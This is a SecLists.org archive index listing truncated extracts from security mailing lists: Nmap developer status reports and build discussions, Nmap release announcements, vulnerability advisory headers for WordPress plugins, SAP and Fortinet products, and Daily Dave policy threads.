SecLists.Org Security Mailing List Archive

Any hacker will tell you that the latest news and exploits are not found on any web site—not even Insecure.Org. No, the cutting edge in security research is and will continue to be the full disclosure mailing lists such as Bugtraq. Here we provide web archives and RSS feeds (now including message extracts), updated in real-time, for many of our favorite lists. Browse the individual lists below, or search them all:

Insecure.Org Lists

Nmap Development — Unmoderated technical development forum for debating ideas, patches, and suggestions regarding proposed changes to Nmap and related projects. Subscribe here.

Prabhjyot's Status Report #14 of 17 Prabhjyot Singh Sodhi (Aug 01)
Hey devs,

I'm now inching towards the implementation of my project into nmap

Achievements:
- Documented the python training code for the multi-stage random forest
model
- Started writing stage 1 prediction code into the c++ engine.
- Made progress on the cmake conversion. I made changes to nmap's Makefile
to enable building of opencv, But am stuck on some absolute urls (in
opencv's build system). Since opencv's build dir...

Re: Zenmap Crashes After Topology View Daniel Miller (Aug 01)
Francis,

Thanks for the bug report. This is a known issue with Nmap 7.12 which has
been fixed in the 7.25BETA1 release, available from
https://nmap.org/download.html . There is also a workaround available at
http://seclists.org/nmap-dev/2016/q2/178

Dan

Re: Each Probe has a rarity except NULL Probe,but i found "kumo-server" Probe has no rarity also. Fyodor (Aug 01)
Good catch! It should probably be rarity 8 like the surrounding probes. I
just added this in r36065.

Cheers,
Fyodor

Zenmap Crashes After Topology View Francis (Aug 01)
Zenmap crashes whenever I go to Topology after a scan. I guess this info:

Version: 7.12
Traceback (most recent call last):
File
"/Applications/Zenmap.app/Contents/Resources/lib/python2.7/site-packages/radialnet/gui/RadialNet.py",
line 878, in expose
self.__draw(context)
File
"/Applications/Zenmap.app/Contents/Resources/lib/python2.7/site-packages/radialnet/gui/RadialNet.py",
line 263, in check_graph_status
return...

Vincent’s Status Report — #14 of 17 Vincent Dumont (Aug 01)
Hello devs,

This week, I am proud to announce that OpenSSL 1.1.0-pre5 and previous versions are now supported by Nmap! Everything
has been merged to the SVN trunk a few hours ago and the CHANGELOG has been updated to reflect that changement. I
encountered no issues while testing it for the last time (after submitting it), but I would also be interested to know
if it works for you guys, so feel free to give your feedback!

Accomplishments:...

Tudor's Status Report - #14 of 17 Tudor-Emil COMAN (Aug 01)
Hi,

This week I've had some unsuccessful attempts to improve some areas of ultra_scan:

1. I tried caching the probes that are allocated in doAnyNewProbes() so that only the first hostgroup allocates memory
for probes and the rest would use those objects from the previous.

For scanning big networks like (65536 hosts) on all ports there doesn't seem to be any time gained, there might be some
milliseconds but I don't think...

Abhishek's Status Report - #14 of 17 Abhishek Singh (Aug 01)
Hello Devs,

This week was about testing PR and writing few test scripts. Me and my
mentor discussed all of the open pull requests and I will be making
suggested changes soon.

Accomplishments

~ Wrote test scripts for #411
~ Made few fixes in #459
~ Wrote script dnssec-check-config.nse and needed changes in dns.lua
library still a lot needs to be done.
~ Fixed #421

Priorities

~ Almost all open PRs, most of them are almost done.
~ dnssec script...

Re: Tudor's Status Report - #13 of 17 Daniel Miller (Jul 31)
Tudor,

This makes a lot of sense. I have a few suggestions, though:

1. We must be absolutely sure that these two checks are doing the same
thing if we are to rely on one to satisfy the other. The obvious fix would
be to have a single function to perform the task, but that might require
some refactoring of data structures and the function signature in order to
carry out. This would be a worthwhile effort to ensure correctness.

2. If the problem...

Re: Tudor's Status Report - #13 of 17 Tudor-Emil COMAN (Jul 31)
Dan,

Well it's like you said, that check is already done for batches of 4096 targets in targets.cc::refresh_hostbatch().

You only need to call target_needs_new_hostgroup in nmap.cc if you are combining targets from different batches.

Let's say you are scanning 5000 hosts, the first 1000 are down, the rest are up. You specified --min-hostgroup 5000.

For a -Pn scan(all hosts are considered up), having the o.ping_group_sz match the...

Re: npcap horror story 食肉大灰兔V5 (Jul 31)
Hi Mike,

I think this is a very rare issue because no one can reproduce it now.
Personally I think the reason is that you installed some incompatible
softwares. A stock Windows OS won't behave like this. So my suggestion is
that you prepare a stock OS, then install your softwares one by one, to see
which software causes this issue.

Another way is that providing a remote access to me, so I can log on to see
what happens.

Cheers,
Yang

On...

Re: Problems building with ASAN Daniel Miller (Jul 30)
Jacek,

Would you mind including your nbase/config.log or at least the portions
relating to getaddrinfo? Does the problem persist if you do "make
distclean" before configuring? Nbase's configure script should detect that
you already have getaddrinfo (which necessarily means you have struct
addrinfo).

Dan

Re: Problems building with ASAN Jacek Wielemborek (Jul 30)
W dniu 30.07.2016 o 06:24, Daniel Miller pisze:

Whoops, you're right, forgot to run "svn up". I did it this time though
and I'm still having issues:

$ make -j1
Compiling libnetutil
cd libnetutil && make
make[1]: Entering directory '/home/d33tah/.nmap/libnetutil'
g++ -c -I../liblinear -I../liblua -I/usr/include/lua
-I../libdnet-stripped/include -I../nbase -I../nsock/include
-DHAVE_CONFIG_H...

Re: Problems building with ASAN Daniel Miller (Jul 29)
Jacek,

To avoid repeating effort, you should make sure you're working from the
latest SVN (which has an internal version number of 7.25SVN). I just pushed
half a dozen fixes for minor issues found with AddressSanitizer and
UndefinedBehaviorSanitizer in the past few days.

Also, if you're having build issues, be sure to "make distclean" before
re-running configure. It shouldn't be necessary to define any HAVE_*
macros, so...

Re: Problems building with ASAN Jacek Wielemborek (Jul 29)
W dniu 30.07.2016 o 02:43, Jacek Wielemborek pisze:

I managed to move on a bit with CFLAGS="-fsanitize=address
-DHAVE_GETADDRINFO=1" CXXFLAGS="-fsanitize=address -DHAVE_GETADDRINFO"
LDFLAGS="-fsanitize=address" ./configure

I had a couple other errors that I had to sort out, such as lack of -ldl
when linking Nmap (required by Lua). Also:

$ ./nmap scanme.nmap.org

Starting Nmap 7.12SVN ( https://nmap.org ) at...

Problems building with ASAN Jacek Wielemborek (Jul 29)
Hello,

Tested under Fedora 23.

g++ -c -I./liblinear -I./liblua -I/usr/include/lua
-I./libdnet-stripped/include -I./nbase -I./nsock/include
-DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\";
-DNMAP_PLATFORM=\"x86_64-unknown-linux-gnu\"
-DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2
-fsanitize=address -Wall -fno-strict-aliasing nse_bit.cc -o nse_bit.o
In file included from...

Nmap Announce — Moderated list for the most important new releases and announcements regarding the Nmap Security Scanner and related projects. We recommend that all Nmap users subscribe.

Nmap 7.25BETA1 Released with our new Npcap driver, 6 new NSE scripts, and more! Fyodor (Jul 19)
Hi folks! As you may know, we've been working for the last 3 years on an
improved Windows packet capturing library named Npcap. It's based on the
original WinPcap (which hasn't been maintained in years), but we rewrote
the driver to use modern APIs (NDIS 6) for better performance. It also
improves security and enables new features. For example, Npcap allows Nmap
to do raw scans (including SYN scans and OS detection) of localhost...

Introducing the 2016 Nmap/Google Summer of Code Team! Fyodor (May 09)
Hello everyone. Google has agreed to sponsor five amazing students to
spend this summer enhancing the Nmap Security Scanner and I'm proud to
introduce our 2015 team:

*Abhishek Singh* will be working as a Feature Creeper and Bug Hunter,
making improvements throughout the Nmap codebase. The project hasn't even
started yet and he's already found and fixed several NSE script bugs and
has other code changes in the works. Abhishek is...

Nmap 7.10 released: 12 new scripts, hundreds of OS/version fingerprints, bug fixes, and more! Fyodor (Mar 17)
Hi Folks! Before I tell you about today's new Nmap release, I wanted to
share some Summer of Code news:

Google posted a fantastic story by one of our Summer of Code alumni about
how the program helped take him from rural China to a full-ride scholarship
at the University of Virginia graduate school! His mentor David and I had
the chance to meet him in San Francisco:...

Nmap Project Seeking Talented Programmers for Google Summer of Code 2016 Fyodor (Feb 29)
Hi folks. I'm delighted to report that Nmap has been accepted by Google to
participate in this year's Summer of Code internship program. This
innovative and extraordinarily generous program provides $5,500 stipends to
college and graduate students anywhere in the world who spend the summer
improving Nmap from home! They gain valuable experience, get paid,
strengthen their résumés, and write code for millions of users. We're one...

Nmap 7 Released! Fyodor (Nov 19)
Hi folks! After 3.5 years of work by more than 100 contributors and 3,200
code commits since Nmap 6, we're delighted to announce Nmap 7! Compared to
Nmap 6, we now have 171 new NSE scripts, mature IPv6 support for everything
from host discovery to port scanning to OS detection, better
infrastructure, significant performance improvements, and a lot more!

For the top 7 improvements in Nmap 7, see the release notes:

https://nmap.org/7

Or...

Nmap 6.49BETA6: 10 new NSE scripts, hundreds of new OS and version detection, GSoC improvements, and more! Fyodor (Nov 03)
Hi folks! I'm happy to announce the release of Nmap 6.49BETA6 with many
great improvements! This includes a lot of work from our Summer of Code
students as well as our regular crew of developers. The release has 10 new
NSE scripts, hundreds of new IPv4 and IPv6 OS detection signatures, and a
bunch of new version detection sigs bringing our total above 10,000! There
are dozens of other improvements as well.

As usual, Nmap 6.49BETA5...

Nmap GSoC 2015 Success Report Fyodor (Oct 19)
Nmap hackers:

I'm pleased to report the successful completion of our 11th Google Summer
of Code. And this year all five of our students passed! They added many
great features and improvements which Nmap users are sure to enjoy. Much
of their work has already been integrated in the Nmap 6.49BETA5 release
last month, and we're working to integrate even more in the upcoming stable
version. Let's look at their accomplishments...

Nmap Project News: 6.49BETA5 release, 18th Birthday, Movie Star, Summer of Code success, Shwag, etc Fyodor (Sep 25)
Hi folks. I know I haven't posted to this Nmap Announcement lists since
June, but we've had a very busy summer and I'm going to try and catch you
up in one go!

First of all, we've had four new releases since then, including today's
release of Nmap 6.49BETA5. They are all stability-focused releases to fix
all the bugs and problems we can find in preparation for a big upcoming
stable release in October (I hope).

As...

Nmap 6.49BETA1 released! New scripts, new signatures, new ASCII art! Fyodor (Jun 03)
Hi Folks. I'm happy to announce the release of Nmap 6.49BETA1. This
version has hundreds of improvements, including:

* 25 new NSE scripts (total is now 494)

* Integrated all of your latest OS detection and version/service detection
submissions (including IPv6). This allows Nmap to properly identify Linux
3.18, Windows 8.1, OS X 10.10, Android 5, etc. We now have more than 10,000
service detection signatures!

* Infrastructure...

Introducing the 2015 Nmap/Google Summer of Code Team! Fyodor (May 07)
Hello everyone. Google has agreed to sponsor five amazing students to
spend this summer enhancing the Nmap Security Scanner and I'm proud to
introduce our 2015 team:

*Andrew Farabee* will be working to refactor parts of the Nmap codebase in
ways which enable more functionality while also improving performance and
hopefully easing code maintenance too! His first task involves adding a
SOCKS proxy name resolution feature to enable scanning...

Nmap Project Seeking Talented Programmers for Google Summer of Code Fyodor (Mar 24)
Hi folks. I'm delighted to report that Nmap has been accepted by Google to
participate in this year's Summer of Code internship program. This
innovative and extraordinarily generous program provides $5,500 stipends to
college and graduate students anywhere in the world who spend the summer
improving Nmap from home! They gain valuable experience, get paid,
strengthen their résumés, and write code for millions of users. We're...

Full Disclosure — A public, vendor-neutral forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. The relaxed atmosphere of this quirky list provides some comic relief and certain industry gossip. More importantly, fresh vulnerabilities sometimes hit this list many hours or days before they pass through the Bugtraq moderation queue.

Cross-Site Scripting in WangGuard WordPress Plugin Summer of Pwnage (Aug 02)
------------------------------------------------------------------------
Cross-Site Scripting in WangGuard WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the WangGuard...

Cross-Site Scripting in Uji Countdown WordPress Plugin Summer of Pwnage (Aug 02)
------------------------------------------------------------------------
Cross-Site Scripting in Uji Countdown WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Uji Countdown...

WinSaber - Unquoted Service Path Privilege Escalation Vulnerability Lab (Aug 02)
Document Title:
===============
WinSaber - Unquoted Service Path Privilege Escalation

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1879

Release Date:
=============
2016-07-29

Vulnerability Laboratory ID (VL-ID):
====================================
1879

Common Vulnerability Scoring System:
====================================
4.2

Product & Service Introduction:...

Zoll ePCR v2.6.4 iOS - Multiple Persistent Vulnerabilities Vulnerability Lab (Aug 02)
Document Title:
===============
Zoll ePCR v2.6.4 iOS - Multiple Persistent Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1882

Release Date:
=============
2016-08-01

Vulnerability Laboratory ID (VL-ID):
====================================
1882

Common Vulnerability Scoring System:
====================================
3.5

Product & Service Introduction:...

Docebo LMS 6.9 - (Moxie) API Calls RST Remote Code Execution Vulnerability Vulnerability Lab (Aug 02)
Document Title:
===============
Docebo LMS 6.9 - (Moxie) API Calls RST Remote Code Execution Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1888

Video: http://www.vulnerability-lab.com/get_content.php?id=1892

Release Date:
=============
2016-08-02

Vulnerability Laboratory ID (VL-ID):
====================================
1888

Common Vulnerability Scoring System:...

Car CMS v3.00.30 - Search Cross Site Scripting Vulnerability Vulnerability Lab (Aug 02)
Document Title:
===============
Car CMS v3.00.30 - Search Cross Site Scripting Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1891

Release Date:
=============
2016-08-01

Vulnerability Laboratory ID (VL-ID):
====================================
1891

Common Vulnerability Scoring System:
====================================
3.2

Product & Service Introduction:...

Guppy CMS v5.01.03 - Client Side Cross Site Scripting Web Vulnerability Vulnerability Lab (Aug 02)
Document Title:
===============
Guppy CMS v5.01.03 - Client Side Cross Site Scripting Web Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1887

Release Date:
=============
2016-07-29

Vulnerability Laboratory ID (VL-ID):
====================================
1887

Common Vulnerability Scoring System:
====================================
3.3

Product & Service Introduction:...

FortiManager (Series) - Multiple Web Vulnerabilities Vulnerability Lab (Aug 02)
Document Title:
===============
FortiManager (Series) - Multiple Web Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1684

Fortinet PSIRT ID: 1624459

Release Notes 1: http://docs.fortinet.com/uploaded/files/2910/fortimanager-v5.4.0-release-notes.pdf
Release Notes 2: http://docs.fortinet.com/uploaded/files/2963/fortimanager-v5.2.6-release-notes.pdf
Release Notes 3:...

Cross-Site Request Forgery in ALO EasyMail Newsletter WordPress Plugin Summer of Pwnage (Aug 01)
------------------------------------------------------------------------
Cross-Site Request Forgery in ALO EasyMail Newsletter WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0021...

Car CMS v3.00.30 - Search Cross Site Scripting Vulnerability Vulnerability Lab (Aug 01)
Document Title:
===============
Car CMS v3.00.30 - Search Cross Site Scripting Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1891

Release Date:
=============
2016-08-01

Vulnerability Laboratory ID (VL-ID):
====================================
1891

Common Vulnerability Scoring System:
====================================
3.2

Product & Service Introduction:...

Fortinet FortiManager & FortiAnalyzer - (filename) Persistent Web Vulnerability Vulnerability Lab (Aug 01)
Document Title:
===============
Fortinet FortiManager & FortiAnalyzer - (filename) Persistent Web Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1687

Fortinet PSIRT ID: 1624561

Release Notes #1: http://docs.fortinet.com/uploaded/files/2796/fortios-5.4.0-release-notes.pdf
Release Notes #2: http://docs.fortinet.com/uploaded/files/2861/fortios-v5.2.6-release-notes.pdf
Release Notes...

Stored Cross-Site Scripting vulnerability in WP Live Chat Support WordPress Plugin Summer of Pwnage (Aug 01)
------------------------------------------------------------------------
Stored Cross-Site Scripting vulnerability in WP Live Chat Support
WordPress Plugin
------------------------------------------------------------------------
Dennis Kerdijk <dennis.at.securelabs.nl> & Erwin Kievith
<erwin.at.securelabs.nl>, July 2016

------------------------------------------------------------------------
Abstract...

Cross-Site Scripting in Contact Bank WordPress Plugin Summer of Pwnage (Aug 01)
------------------------------------------------------------------------
Cross-Site Scripting in Contact Bank WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Contact Bank...

SQL injection vulnerability in Booking Calendar WordPress Plugin Summer of Pwnage (Aug 01)
------------------------------------------------------------------------
SQL injection vulnerability in Booking Calendar WordPress Plugin
------------------------------------------------------------------------
Edwin Molenaar, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
An SQL injection vulnerability exists in the Booking...

Cross-Site Scripting vulnerability in Booking Calendar WordPress Plugin Summer of Pwnage (Aug 01)
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Booking Calendar WordPress Plugin
------------------------------------------------------------------------
Edwin Molenaar, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in...

Other Excellent Security Lists

Bugtraq — The premier general security mailing list. Vulnerabilities are often announced here first, so check frequently!

Penetration Testing — While this list is intended for "professionals", participants frequenly disclose techniques and strategies that would be useful to anyone with a practical interest in security and network auditing.

[ERPSCAN-16-021] SAP xMII - Reflected XSS vulnerability ERPScan inc (Jul 14)
Application: SAP xMII

Versions Affected: SAP xMII 15

Vendor URL: http://SAP.com

Bugs: XSS

Sent: 04.12.2015

Reported: 05.12.2015

Vendor response: 05.12.2015

Date of Public Advisory: 12.04.2016

Reference: SAP Security Note 2201295

Author: Nursultan Abubakirov (ERPScan) , Vahagn Vardanyan (ERPScan)

Description

1. ADVISORY INFORMATION

Title: SAP xMII – Reflected XSS vulnerability

Advisory ID: [ERPSCAN-16-021]

Risk: medium

Advisory...

[ERPSCAN-16-020] SAP NetWeaver AS JAVA UDDI component - XXE vulnerability ERPScan inc (Jul 14)
Application: SAP NetWeaver AS JAVA

Versions Affected: SAP NetWeaver AS JAVA 7.4

Vendor URL: http://SAP.com

Bug: XXE

Sent: 04.12.2015

Reported: 05.12.2015

Vendor response: 05.12.2015

Date of Public Advisory: 12.04.2016

Reference: SAP Security Note 2254389

Author: Vahagn Vardanyan (ERPScan)

Description

1. ADVISORY INFORMATION

Title: SAP NetWeaver AS JAVA UDDI component – XXE vulnerability

Advisory ID: [ERPSCAN-16-020]

Risk:...

[ERPSCAN-16-019] SAP NetWeaver Enqueue Server - DoS vulnerability ERPScan inc (Jul 14)
Application: SAP NetWeaver Enqueue Server

Versions Affected: SAP NetWeaver Enqueue Server 7.4

Vendor URL: http://SAP.com

Bug: denial of service

Sent: 04.12.2015

Reported: 05.12.2015

Vendor response: 05.12.2015

Date of Public Advisory: 12.04.2016

Reference: SAP Security Note 2258784

Author: Vahagn Vardanyan (ERPScan)

Description

1. ADVISORY INFORMATION

Title: SAP NetWeaver Enqueue Server – DoS vulnerability

Advisory ID:...

[ERPSCAN-16-012] SAP NetWeaver AS JAVA - directory traversal vulnerability ERPScan inc (Jun 17)
Application: SAP NetWeaver AS JAVA

Versions Affected: SAP NetWeaver AS JAVA 7.1 - 7.5

Vendor URL: http://SAP.com

Bug: Directory traversal

Sent: 29.09.2015

Reported: 29.09.2015

Vendor response: 30.09.2015

Date of Public Advisory: 08.03.2016

Reference: SAP Security Note 2234971

Author: Vahagn Vardanyan (ERPScan)

Description

1. ADVISORY INFORMATION

Title: [ERPSCAN-16-012] SAP NetWeaver AS Java directory traversal vulnerability...

[ERPSCAN-16-013] SAP NetWeaver AS Java ctcprotocol servlet - XXE vulnerability ERPScan inc (Jun 17)
Application: SAP NetWeaver AS JAVA

Versions Affected: SAP NetWeaver AS JAVA 7.1 - 7.5

Vendor URL: http://SAP.com

Bug: XXE

Sent: 20.10.2015

Reported: 21.10.2015

Vendor response: 21.10.2015

Date of Public Advisory: 08.03.2016

Reference: SAP Security Note 2235994

Author: Vahagn Vardanyan (ERPScan)

Description

1. ADVISORY INFORMATION

Title: [ERPSCAN-16-013] SAP NetWeaver AS Java ctcprotocol servlet –
XXE vulnerability

Advisory...

[ERPSCAN-16-014] SAP NetWeaver AS Java NavigationURLTester - XSS vulnerability ERPScan inc (Jun 17)
Application: SAP NetWeaver AS JAVA

Versions Affected: SAP NetWeaver AS JAVA 7.1 - 7.5

Vendor URL: http://SAP.com

Bug: XSS

Sent: 20.10.2015

Reported: 21.10.2015

Vendor response: 21.10.2015

Date of Public Advisory: 08.03.2016

Reference: SAP Security Note 2238375

Author: Vahagn Vardanyan (ERPScan)

Description

1. ADVISORY INFORMATION

Title: [ERPSCAN-16-014] SAP NetWeaver AS Java NavigationURLTester –
XSS vulnerability

Advisory...

Info Security News — Carries news items (generally from mainstream sources) that relate to security.

Web App Security — Provides insights on the unique challenges which make web applications notoriously hard to secure, as well as attack methods including SQL injection, cross-site scripting (XSS), cross-site request forgery, and more.

Faraday v1.0.21 with our new GTK interface! Francisco Amato (Jun 21)
Faraday is the Integrated Multiuser Risk Environment you were looking
for! It maps and leverages all the knowledge you generate in real
time, letting you track and understand your audits. Our dashboard for
CISOs and managers uncovers the impact and risk being assessed by the
audit in real-time without the need for a single email. Developed with
a specialized set of functionalities that help users improve their own
work, the main purpose is to...

Faraday v1.0.20 is here! New conflict resolution, hosts and services views & bug fixes! Francisco Amato (May 27)
A brand new Faraday version is ready! Faraday v1.0.20 is here,
bringing more functionality to our GTK interface and other cool new
features.

If you've been keeping up with Faraday, on our last release
http://blog.infobytesec.com/2016/04/prepare-warm-welcome-for-faraday-v1019.html
we published a new experimental GTK interface. In this iteration we
added several missing features and fixed a lot of small bugs.

You will probably notice the...

44CON CFP Now Open Steve (May 17)
44CON is the UK's premier annual technical security conference and training event. From the evening of the 14th of
September till the 16th of September 2016, expect a top-tier international technical conference with fast wifi, loose
0day, catering, a bar and of course, Gin O'Clock.

_____ ______ _____________________ __ |
__ // /_ // /_ ____/_ __ \__ | / / | "London calling to the
_ // /_ // /_ / _ / / /_ |/ / |...

Give a warm welcome to Faraday v1.0.19! New GTK interface, Custom Reports & Bug fixing Francisco Amato (May 05)
Faraday v1.0.19 is ready! More documentation, a new interface and
plugin fixes are some of the improvements included in this version.

Continuing with our efforts to make Faraday accessible to everyone we
stopped the development and spent a few days improving our
documentation, so feel free to take a look at it and let us know if
you feel something is missing!

It shouldn't come as a surprise that our QT interface will be
deprecated during...

Mobile Security Framework (MobSF) v0.9.2 Released Ajin Abraham (May 03)
Hey Folks,

Happy to release MobSF v0.9.2

About MobSF

Mobile Security Framework (MobSF) is an intelligent, all-in-one open
source mobile application (Android/iOS) automated pen-testing
framework capable of performing static and dynamic analysis. It can be
used for effective and fast security analysis of Android and iOS
Applications and supports both binaries (APK & IPA) and zipped source
code. MobSF can also perform Web API Security testing...

Check out faraday v1.0.18! New CLI mode, Jira support & bug fixes! Francisco Amato (Apr 07)
Today we are happy to announce that Faraday v1.0.18 is ready!

A short iteration, filled with small powerups - brand new CLI mode
allows you to process reports in batch, new helpers and plugin fixes.

We know that our users rely on a lot of different systems and
solutions and we want to integrate Faraday in that workflow. In that
order we added the ability to easily export data into a JIRA
installation, allowing users to share the findings...

Call for Papers and Posters: CSCESM2016 - Greece Jackie Blanco (Mar 31)
====================================================
Paper and Poster Submission Deadline: April 13, 2016
====================================================

The Third International Conference on Computer Science, Computer
Engineering, and Social Media (CSCESM2016)

Metropolitan College, Thessaloniki, Greece
May 13-15, 2016
http://www.sdiwc.net/conferences/cscesm2016/
cscesm16 () sdiwc net

The conference welcomes papers on the following (but...

Releasing Mobile Security Framework v0.9 Ajin Abraham (Mar 14)
Hey Folks,

I just released a new version of Mobile Security Framework, an open
source framework capable of performing end to end security testing of
mobile applications.

Mobile Security Framework (MobSF) is an all-in-one open source mobile
application (Android/iOS) automated pen-testing framework capable of
performing static and dynamic analysis. It can be used for effective
and fast security analysis of Android and iOS Applications and...

Approve Andrew van der Stock (Mar 13)
This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------

ICGCTI2016 Malaysia call for papers and participants Jackie Blanco (Mar 03)
The Fourth International Conference on Green Computing, Technology and
Innovation (ICGCTI2016)
- Part of The Fifth World Congress on Computing, Engineering and
Technology (WCCET) -

Asia Pacific University of Technology & Innovation (A.P.U.)
Kuala Lumpur, Malaysia | September 6-8, 2016

http://sdiwc.net/conferences/icgcti2016/
icgcti16 () sdiwc net
================================================================
All registered papers will...

Make room for faraday v1.0.17! New #maltego & #arachni plugins & more! Francisco Amato (Feb 26)
The first of many releases in 2016, Faraday v.1.0.17 (Community, Pro &
Corp) introduces a new Maltego Plugin, support for Mint 17 and Kali
Rolling, and several fixes including installation issues.

Changes:
New Maltego Plugin

Added support for Kali Rolling Edition
Added support for Mint 17
Added user notification when the current Workspace doesn't exist

Added removeBySeverity.py script - as its name describes, it removes
all vulns with...

RVAsec 2016 CFP is now Open! Sullo (Feb 13)
RVAsec 5 // June 2-3rd, 2016 // Richmond, VA

RVAsec is a Richmond, VA based security convention that brings top
industry speakers to the mid-atlantic region. In its fourth year,
RVAsec 2015 attracted nearly 400 security professionals from across
the country. For 2016, the conference is a two day and dual-track
format, with a mixed focus on technical and management/business
presentations.

All talks must be 55 minutes in length, and submissions...

Arachni Framework v1.4 & WebUI v0.5.10 have been released (Web Application Security Scanner) Tasos Laskos (Feb 09)
Hey folks,

There's a new version of Arachni, a modular and high-performance Web Application Security Scanner Framework.

The highlights of this release are:

* Massive performance improvements (approx. 5 times faster browser operations,
much reduced less RAM and CPU usage).
* Significantly improved coverage via better support for JS effects and event delegation tracking.
* Brand new REST API for easy integration.
* Native support for MS...

Daily Dave — This technical discussion list covers vulnerability research, exploit development, and security events/gossip. It was started by ImmunitySec founder Dave Aitel and many security luminaries participate. Many posts simply advertise Immunity products, but you can't really fault Dave for being self-promotional on a list named DailyDave.

The Correct Amount dave aitel (Aug 02)
Last week I did the technical review of one of our deliverables. Super
secure website, run by smart people. They'd limited their exposure to
one PHP file. But a good security services company provides strategic
advice, along with individual tactical recommendations. In this case,
the consultant found two critical vulnerabilities in just that one
lonely PHP file. Our strategic recommendation is always this: Use as
much PHP on your website as...

Re: Clique - a stillborn project Dan Guido (Aug 01)
Sorry to revive a dead thread, but I think this general idea of a
re-encrypting mailing list has been implemented:

https://bitbucket.org/awruef/listcrypt/src

Enjoy!

-Dan

Re: Dailydave Digest, Vol 56, Issue 10 Dave Aitel (Jul 31)
In my head I equate using computer and network operations (CNO) inside an
organization to enable information operations (IO) to getting exploitation
primitives and enabling a "Weird Machine
<http://www.slideshare.net/scovetta/fundamentals-of-exploitationrevisited>".
IO has a long history, but it's a completely different thing once CNE gets
involved. You get a feedback loop. It's like having a debugger, versus
blindly...

Re: "Clickbait policy-making" Konrads Smelkovs (Jul 31)
[..]

That's because cyber is much more about infowar than death and
destruction as with NBC. And Daily Mail is an amplifier and outlet of
propaganda regardless of whoever served it, so studying in and citing
as as an example of infowar pen-ultimate stage (the ultimate being
change in someone's mindset) is legitimate.

Re: hacking ideology J.M. Porup (Jul 31)
Isn't "hacking ideology" precisely the sort of speech the First
Amendment was designed to protect?

jmp

Re: "Clickbait policy-making" Mara Tam (Jul 29)
Dave’s not wrong about this. Cyber policy suffers horribly from the fact that it is disproportionately informed by
popular press (i.e. clickbait).

The American Academy of Arts and Sciences recently published a collection titled ‘Governance of Dual-Use Technologies :
Theory and Practice’.[1] This collection covers nuclear technologies, biological technologies, and IT / ‘cyber
weapons'. If you read all three sections, it becomes...

Re: Dailydave Digest, Vol 56, Issue 10 Paul Erling (Jul 29)
I could agree that the damage cyberwar does is mostly to ideology, but then what is the difference between cyberwar and
propaganda or even marketing? Isn't it just the fact that you have retrieved some difficult to obtain evidence? Does
that make the propaganda/marketing more believable and so effective?

- Paul

-----Original Message-----
From: dailydave-bounces () lists immunityinc com [mailto:dailydave-bounces () lists immunityinc...

Re: "Nitro Zeus" whatever whatever. Ejovi Nuwere (Jul 29)
This article in the New Yorker seems to align well with your explanation of cyberwar as a systemic disruption of
ideology.

http://www.newyorker.com/news/news-desk/the-real-paranoia-inducing-purpose-of-russian-hacks

Sent from my iPhone

SAINTCON Security Conference Troy Jessup (Jul 29)
SAINTCON 2016

SAINTCON is the Intermountain-West premiere Cybersecurity conference held in Provo, Utah. This conference is
dedicated to all things security and focuses on security discussions and trainings. If you live or work in the west,
this is your security con!

https://www.saintcon.org

"Nitro Zeus" whatever whatever. dave aitel (Jul 28)
<nitrozeus>

https://www.youtube.com/watch?v=GiV6am2lNTQ. You'll notice in this
Usenix talk from 2012 I inadvertently blow Nitro Zeus, which came out in
that ZeroDays movie recently. I honestly don't write my talks all by
myself, but you'll notice "we" call out Wikileaks as being a cyber
weapon as opposed to everyone else's seeming fascination with
HackingTeam or whatever the boogieman of the day is.

People...

"Clickbait policy-making" dave aitel (Jul 28)
https://na-production.s3.amazonaws.com/documents/Bugs-in-the-System-Final.pdf

Look, I'm sure these (Andi Wilson, Ross Schulman, Kevin Bankston, Trey
Herr) are all good people:<image about authors went here>

But I want to point out that you cannot make good policy recommendations
based on clickbait news articles you've happened to have read over the
years on a subject that is under a ton of covert protection, especially
when none...

A Peer Review of the Latest Bellovin Paper on Cyber Weapons Dave Aitel (Jul 18)
http://papers.ssrn.com/sol3/papers.cfm?abstract_id=2809463
Limiting the Undesired Impact of Cyber Weapons: Technical Requirements and
Policy Implications
Steven M. Bellovin, Susan Landau, and Herbert S. Lin
*Acknowledgements: We are grateful for comments from Thomas Berson, Joseph
Nye, and Michael Sulemeyer, which improved the paper. *

In case you're curious: This paper went off the rails in my opinion in a
couple areas. The first is that...

Re: Clique - a stillborn project future (Jul 18)
another encrypted mailinglist is schleuder.
It works. http://schleuder2.nadir.org/

If you want to have a serverless encrypted mailinglist Bitmessage works
too.
https://www.bitmessage.org/wiki/Main_Page
Some people don't like the interface. Someone i know reads Bitmessages
on his email client.

Find a list of pros and cons here:
http://7ywdkxkpi7kk55by.onion/trac/wiki/PromisingProjects/BitMessage
another contra: it lacks the...

